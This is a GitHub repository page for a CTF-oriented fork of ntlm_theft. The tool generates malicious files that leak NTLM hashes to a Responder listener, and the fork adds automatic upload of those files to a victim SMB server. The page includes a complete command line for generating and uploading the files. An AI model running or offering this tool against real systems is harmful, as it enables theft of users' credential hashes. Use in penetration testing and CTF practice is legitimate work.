Skip to content

A fork of ntlm_theft by Jacob Wilkin (Greenwolf) that automatically uploads files to a target smb server

License

Notifications You must be signed in to change notification settings

h8handles/ntlm_theftCTF

 
 

Repository files navigation

This is a fork of ntlm_theft A tool to generate malicious files to steal ntlm hashes using responder. I have added an optional CTF arg (not realistic for realworld i don't think). This upload argument will take all the files generated byt ntlm_theft and upload them to the victim defined by rserver andd rport

python3 ntlm_theft.py --generate all --server 127.0.0.1 --filename 'desktop' --upload -rserver localhost -rport 445 -smbuser guest -smbpass '' -d ./desktop/

image

After normal generation of the malicious files it will take the directory created and upload the files

List of files Uploaded

image

Issues

  • need a way to handle netbios name not hardcode
  • having issues working remotely but local concept works
  • very ugly :D

About

A fork of ntlm_theft by Jacob Wilkin (Greenwolf) that automatically uploads files to a target smb server

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%